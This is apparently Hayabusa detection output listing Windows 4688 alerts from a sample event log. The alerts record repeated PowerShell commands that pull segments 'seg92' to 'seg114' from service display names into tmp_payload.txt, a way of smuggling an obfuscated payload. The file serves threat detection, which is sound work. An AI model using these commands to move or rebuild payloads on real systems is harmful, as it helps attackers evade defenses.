Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:42.211 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:42.227 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:48.052 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:48.067 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:55.301 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:55.317 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:56.773 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:56.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:02.569 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:02.585 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
